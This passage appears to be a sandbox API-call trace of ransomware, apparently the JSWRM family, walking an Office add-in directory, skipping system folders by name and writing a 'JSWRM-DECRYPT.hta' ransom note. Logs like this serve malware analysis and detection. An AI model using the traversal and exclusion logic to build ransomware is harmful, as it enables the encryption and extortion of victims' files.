lpMultiByteStr="Microsoft.Mashup.Client.Windows.resources.dll", lpUsedDefaultChar=0x0) returned 45 [0123.190] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x232b48 | out: hHeap=0x1e0000) returned 1 [0123.190] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x232db8 [0123.190] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.Mashup.Client.Windows.resources.dll", cchWideChar=45, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 45 [0123.190] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0123.190] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.Mashup.Client.Windows.resources.dll", cchWideChar=45, lpMultiByteStr=0x22d260, cbMultiByte=45, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.Mashup.Client.Windows.resources.dll", lpUsedDefaultChar=0x0) returned 45 [0123.190] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x232db8 | out: hHeap=0x1e0000) returned 1 [0123.190] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x130) returned 0x245470 [0123.190] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x245338 | out: hHeap=0x1e0000) returned 1 [0123.190] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0123.190] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0123.190] FindNextFileW (in: hFindFile=0x232100, lpFindFileData=0x345def0 | out: lpFindFileData=0x345def0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xf12dd5ae, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xf12dd5ae, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xf1329a43, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x36aa8, dwReserved0=0x60002, dwReserved1=0x22b0cc, cFileName="Microsoft.Mashup.Document.resources.dll", cAlternateFileName="MICROS~1.DLL")) returned 1 [0123.190] lstrcmpiW (lpString1="Microsoft.Mashup.Document.resources.dll", lpString2=".") returned 1 [0123.190] lstrcmpiW (lpString1="Microsoft.Mashup.Document.resources.dll", lpString2="..") returned 1 [0123.190] lstrcmpiW (lpString1="Microsoft.Mashup.Document.resources.dll", lpString2="...") returned 1 [0123.190] lstrcmpiW (lpString1="Microsoft.Mashup.Document.resources.dll", lpString2="windows") returned -1 [0123.190] lstrcmpiW (lpString1="Microsoft.Mashup.Document.resources.dll", lpString2="recovery") returned -1 [0123.190] lstrcmpiW (lpString1="Microsoft.Mashup.Document.resources.dll", lpString2="perflogs") returned -1 [0123.190] lstrcmpiW (lpString1="Microsoft.Mashup.Document.resources.dll", lpString2="documents and settings") returned 1 [0123.190] lstrcmpiW (lpString1="Microsoft.Mashup.Document.resources.dll", lpString2="$RECYCLE.BIN") returned 1 [0123.190] lstrcmpiW (lpString1="Microsoft.Mashup.Document.resources.dll", lpString2="system volume information") returned -1 [0123.190] lstrcmpiW (lpString1="Microsoft.Mashup.Document.resources.dll", lpString2="msocache") returned -1 [0123.190] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c7f8 [0123.190] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.Mashup.Document.resources.dll", cchWideChar=39, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 39 [0123.190] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0123.191] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.Mashup.Document.resources.dll", cchWideChar=39, lpMultiByteStr=0x22cdc8, cbMultiByte=39, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.Mashup.Document.resources.dll", lpUsedDefaultChar=0x0) returned 39 [0123.191] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c7f8 | out: hHeap=0x1e0000) returned 1 [0123.191] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c118 [0123.191] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.Mashup.Document.resources.dll", cchWideChar=39, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 39 [0123.191] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0123.191] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.Mashup.Document.resources.dll", cchWideChar=39, lpMultiByteStr=0x22d0a0, cbMultiByte=39, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.Mashup.Document.resources.dll", lpUsedDefaultChar=0x0) returned 39 [0123.191] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c118 | out: hHeap=0x1e0000) returned 1 [0123.191] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x130) returned 0x244f90 [0123.191] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x245470 | out: hHeap=0x1e0000) returned 1 [0123.191] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0123.191] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0123.191] FindNextFileW (in: hFindFile=0x232100, lpFindFileData=0x345def0 | out: lpFindFileData=0x345def0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xfbda21cf, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xfbda21cf, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xfbda21cf, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x94aa8, dwReserved0=0x60002, dwReserved1=0x22b0cc, cFileName="Microsoft.MashupEngine.resources.dll", cAlternateFileName="MICROS~2.DLL")) returned 1 [0123.191] lstrcmpiW (lpString1="Microsoft.MashupEngine.resources.dll", lpString2=".") returned 1 [0123.191] lstrcmpiW (lpString1="Microsoft.MashupEngine.resources.dll", lpString2="..") returned 1 [0123.191] lstrcmpiW (lpString1="Microsoft.MashupEngine.resources.dll", lpString2="...") returned 1 [0123.191] lstrcmpiW (lpString1="Microsoft.MashupEngine.resources.dll", lpString2="windows") returned -1 [0123.191] lstrcmpiW (lpString1="Microsoft.MashupEngine.resources.dll", lpString2="recovery") returned -1 [0123.191] lstrcmpiW (lpString1="Microsoft.MashupEngine.resources.dll", lpString2="perflogs") returned -1 [0123.191] lstrcmpiW (lpString1="Microsoft.MashupEngine.resources.dll", lpString2="documents and settings") returned 1 [0123.191] lstrcmpiW (lpString1="Microsoft.MashupEngine.resources.dll", lpString2="$RECYCLE.BIN") returned 1 [0123.191] lstrcmpiW (lpString1="Microsoft.MashupEngine.resources.dll", lpString2="system volume information") returned -1 [0123.191] lstrcmpiW (lpString1="Microsoft.MashupEngine.resources.dll", lpString2="msocache") returned -1 [0123.191] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22bf60 [0123.191] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.MashupEngine.resources.dll", cchWideChar=36, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 36 [0123.191] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0123.191] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.MashupEngine.resources.dll", cchWideChar=36, lpMultiByteStr=0x22cdc8, cbMultiByte=36, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.MashupEngine.resources.dll", lpUsedDefaultChar=0x0) returned 36 [0123.191] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22bf60 | out: hHeap=0x1e0000) returned 1 [0123.191] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22bd50 [0123.191] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.MashupEngine.resources.dll", cchWideChar=36, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 36 [0123.191] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0123.191] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.MashupEngine.resources.dll", cchWideChar=36, lpMultiByteStr=0x22d0a0, cbMultiByte=36, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.MashupEngine.resources.dll", lpUsedDefaultChar=0x0) returned 36 [0123.191] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22bd50 | out: hHeap=0x1e0000) returned 1 [0123.191] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x120) returned 0x23f158 [0123.192] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x244f90 | out: hHeap=0x1e0000) returned 1 [0123.192] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0123.192] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0123.192] FindNextFileW (in: hFindFile=0x232100, lpFindFileData=0x345def0 | out: lpFindFileData=0x345def0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xfbda21cf, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xfbda21cf, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xfbda21cf, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x94aa8, dwReserved0=0x60002, dwReserved1=0x22b0cc, cFileName="Microsoft.MashupEngine.resources.dll", cAlternateFileName="MICROS~2.DLL")) returned 0 [0123.192] FindClose (in: hFindFile=0x232100 | out: hFindFile=0x232100) returned 1 [0123.192] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23f158 | out: hHeap=0x1e0000) returned 1 [0123.192] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22b820 | out: hHeap=0x1e0000) returned 1 [0123.192] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22b908 | out: hHeap=0x1e0000) returned 1 [0123.192] FindNextFileW (in: hFindFile=0x232080, lpFindFileData=0x345e258 | out: lpFindFileData=0x345e258*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3ff5e5a6, ftCreationTime.dwHighDateTime=0x1d53d3c, ftLastAccessTime.dwLowDateTime=0x3ff5e5a6, ftLastAccessTime.dwHighDateTime=0x1d53d3c, ftLastWriteTime.dwLowDateTime=0x3ff5e5a6, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x230c, dwReserved0=0x60002, dwReserved1=0x1fc8d4, cFileName="JSWRM-DECRYPT.hta", cAlternateFileName="JSWRM-~1.HTA")) returned 1 [0123.192] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2=".") returned 1 [0123.192] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="..") returned 1 [0123.192] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="...") returned 1 [0123.192] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="windows") returned -1 [0123.192] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="recovery") returned -1 [0123.192] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="perflogs") returned -1 [0123.192] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="documents and settings") returned 1 [0123.192] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="$RECYCLE.BIN") returned 1 [0123.192] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="system volume information") returned -1 [0123.192] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="msocache") returned -1 [0123.192] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d298 [0123.192] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0123.192] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241290 [0123.192] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x241290, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM-DECRYPT.hta", lpUsedDefaultChar=0x0) returned 17 [0123.192] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d298 | out: hHeap=0x1e0000) returned 1 [0123.192] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0123.192] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0123.192] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2410d8 [0123.192] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x2410d8, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM-DECRYPT.hta", lpUsedDefaultChar=0x0) returned 17 [0123.192] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0123.192] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xf0) returned 0x2472c8 [0123.192] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22b1c8 | out: hHeap=0x1e0000) returned 1 [0123.192] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2410d8 | out: hHeap=0x1e0000) returned 1 [0123.192] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241290 | out: hHeap=0x1e0000) returned 1 [0123.193] FindNextFileW (in: hFindFile=0x232080, lpFindFileData=0x345e258 | out: lpFindFileData=0x345e258*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfbd09866, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x6d2b978, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x6d2b978, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x60002, dwReserved1=0x1fc8d4, cFileName="kk", cAlternateFileName="")) returned 1 [0123.193] lstrcmpiW (lpString1="kk", lpString2=".") returned 1 [0123.193] lstrcmpiW (lpString1="kk", lpString2="..") returned 1 [0123.193] lstrcmpiW (lpString1="kk", lpString2="...") returned 1 [0123.193] lstrcmpiW (lpString1="kk", lpString2="windows") returned -1 [0123.193] lstrcmpiW (lpString1="kk", lpString2="recovery") returned -1 [0123.193] lstrcmpiW (lpString1="kk", lpString2="perflogs") returned -1 [0123.193] lstrcmpiW (lpString1="kk", lpString2="documents and settings") returned 1 [0123.193] lstrcmpiW (lpString1="kk", lpString2="$RECYCLE.BIN") returned 1 [0123.193] lstrcmpiW (lpString1="kk", lpString2="system volume information") returned -1 [0123.193] lstrcmpiW (lpString1="kk", lpString2="msocache") returned -1 [0123.193] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xe0) returned 0x22b0e0 [0123.193] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2472c8 | out: hHeap=0x1e0000) returned 1 [0123.193] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xe0) returned 0x22b1c8 [0123.193] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xe0) returned 0x22b2b0 [0123.193] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x14e) returned 0x21c578 [0123.193] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22b2b0 | out: hHeap=0x1e0000) returned 1 [0123.193] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\Microsoft Power Query for Excel Integrated\\bin\\kk\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\microsoft office\\root\\office16\\addins\\microsoft power query for excel integrated\\bin\\kk\\jswrm-decrypt.hta")) returned 0xffffffff [0123.204] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x21c578 | out: hHeap=0x1e0000) returned 1 [0123.204] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0123.204] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345b0bc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0123.204] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241268 | out: hHeap=0x1e0000) returned 1 [0123.204] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\Microsoft Power Query for Excel Integrated\\bin\\kk\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\microsoft office\\root\\office16\\addins\\microsoft power query for excel integrated\\bin\\kk\\jswrm-decrypt.hta"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x338 [0123.206] SetFilePointer (in: hFile=0x338, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0123.206] WriteFile (in: hFile=0x338, lpBuffer=0x345b1d0*, nNumberOfBytesToWrite=0x230c, lpNumberOfBytesWritten=0x345b19c, lpOverlapped=0x0 | out: lpBuffer=0x345b1d0*, lpNumberOfBytesWritten=0x345b19c*=0x230c, lpOverlapped=0x0) returned 1 [0123.207] CloseHandle (hObject=0x338) returned 1 [0123.207] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\Microsoft Power Query for Excel Integrated\\bin\\kk\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\microsoft office\\root\\office16\\addins\\microsoft power query for excel integrated\\bin\\kk\\jswrm-decrypt.hta")) returned 0x20 [0123.207] FindFirstFileW (in: lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\Microsoft Power Query for Excel Integrated\\bin\\kk\\*.*", lpFindFileData=0x345def0 | out: lpFindFileData=0x345def0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfbd09866, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x6d2b978, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x4019a86c, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x60002, dwReserved1=0x22b0cc, cFileName=".", cAlternateFileName="")) returned 0x231bc0 [0123.207] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0123.207] FindNextFileW (in: hFindFile=0x231bc0, lpFindFileData=0x345def0 | out: lpFindFileData=0x345def0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfbd09866, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x6d2b978, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x4019a86c, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x60002, dwReserved1=0x22b0cc, cFileName="..", cAlternateFileName="")) returned 1 [0123.207] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0123.207] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0123.207] FindNextFileW (in: hFindFile=0x231bc0, lpFindFileData=0x345def0 | out: lpFindFileData=0x345def0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4019a86c, ftCreationTime.dwHighDateTime=0x1d53d3c, ftLastAccessTime.dwLowDateTime=0x4019a86c, ftLastAccessTime.dwHighDateTime=0x1d53d3c, ftLastWriteTime.dwLowDateTime=0x4019a86c, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x230c, dwReserved0=0x60002, dwReserved1=0x22b0cc, cFileName="JSWRM-DECRYPT.hta", cAlternateFileName="JSWRM-~1.HTA")) returned 1 [0123.207] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2=".") returned 1 [0123.207] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="..") returned 1 [0123.207] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="...") returned 1 [0123.207] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="windows") returned -1 [0123.207] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="recovery") returned -1 [0123.207] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="perflogs") returned -1 [0123.207] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="documents and settings") returned 1 [0123.207] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="$RECYCLE.BIN") returned 1 [0123.207] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="system volume information") returned -1 [0123.207] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="msocache") returned -1 [0123.207] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0123.207] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0123.207] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2412b8 [0123.207] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x2412b8, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM-DECRYPT.hta", lpUsedDefaultChar=0x0) returned 17 [0123.207] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0123.207] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0d8 [0123.208] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0123.208] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241128 [0123.208] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x241128, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM-DECRYPT.hta", lpUsedDefaultChar=0x0) returned 17 [0123.208] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0d8 | out: hHeap=0x1e0000) returned 1 [0123.208] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x100) returned 0x1f19f0 [0123.208] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22bad8 | out: hHeap=0x1e0000) returned 1 [0123.208] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241128 | out: hHeap=0x1e0000) returned 1 [0123.208] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2412b8 | out: hHeap=0x1e0000) returned 1 [0123.208] FindNextFileW (in: hFindFile=0x231bc0, lpFindFileData=0x345def0 | out: lpFindFileData=0x345def0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xfbd2face, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xfbd2face, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xfbd2face, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x10aa8, dwReserved0=0x60002, dwReserved1=0x22b0cc, cFileName="Microsoft.Mashup.Client.Excel.resources.dll", cAlternateFileName="MICROS~1.DLL")) returned 1 [0123.208] lstrcmpiW (lpString1="Microsoft.Mashup.Client.Excel.resources.dll", lpString2=".") returned 1 [0123.208] lstrcmpiW (lpString1="Microsoft.Mashup.Client.Excel.resources.dll", lpString2="..") returned 1 [0123.208] lstrcmpiW (lpString1="Microsoft.Mashup.Client.Excel.resources.dll", lpString2="...") returned 1 [0123.208] lstrcmpiW (lpString1="Microsoft.Mashup.Client.Excel.resources.dll", lpString2="windows") returned -1 [0123.208] lstrcmpiW (lpString1="Microsoft.Mashup.Client.Excel.resources.dll", lpString2="recovery") returned -1 [0123.208] lstrcmpiW (lpString1="Microsoft.Mashup.Client.Excel.resources.dll", lpString2="perflogs") returned -1 [0123.208] lstrcmpiW (lpString1="Microsoft.Mashup.Client.Excel.resources.dll", lpString2="documents and settings") returned 1 [0123.208] lstrcmpiW (lpString1="Microsoft.Mashup.Client.Excel.resources.dll", lpString2="$RECYCLE.BIN") returned 1 [0123.208] lstrcmpiW (lpString1="Microsoft.Mashup.Client.Excel.resources.dll", lpString2="system volume information") returned -1 [0123.208] lstrcmpiW (lpString1="Microsoft.Mashup.Client.Excel.resources.dll", lpString2="msocache") returned -1 [0123.208] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x232fc0 [0123.208] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.Mashup.Client.Excel.resources.dll", cchWideChar=43, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 43 [0123.208] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0123.208] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.Mashup.Client.Excel.resources.dll", cchWideChar=43, lpMultiByteStr=0x22cdc8, cbMultiByte=43, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.Mashup.Client.Excel.resources.dll", lpUsedDefaultChar=0x0) returned 43 [0123.208] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x232fc0 | out: hHeap=0x1e0000) returned 1 [0123.208] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x232e88 [0123.208] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, 